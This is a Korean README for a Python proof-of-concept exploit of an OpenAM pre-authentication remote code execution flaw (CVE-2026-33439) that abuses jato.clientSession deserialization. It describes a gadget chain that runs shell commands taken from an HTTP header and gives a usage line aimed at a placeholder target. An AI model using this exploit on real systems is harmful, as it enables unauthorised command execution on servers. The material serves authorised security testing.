
OpenAM의 jato.clientSession 역직렬화를 통한 사전 인증 RCE 취약점인 CVE-2026-33439에 대한 Python PoC
jato.clientSession 역직렬화에서 발생하는 OpenAM 사전 인증 원격 코드 실행 취약점에 대한 독립 실행형 Python 개념 증명(proof of concept)입니다.
내장된 shaded Click/Xalan 가젯은 cmd HTTP 헤더에서 셸 명령을 읽고 그 출력을 HTTP 응답으로 반환합니다. 외부 Python 패키지, Java 런타임 또는 JAR 파일이 필요하지 않습니다.
python3 exploit.py \
--url https://target.example/openam/ui/PWResetUserValidation \
'id'
선택적 인수:
--timeout SECONDS 요청 타임아웃 (기본값: 15)
--proxy URL HTTP 프록시, 예: http://127.0.0.1:8080
--verify-tls TLS 인증서 검증 활성화
소유하고 있거나 명시적으로 테스트 권한을 부여받은 시스템에만 사용하십시오.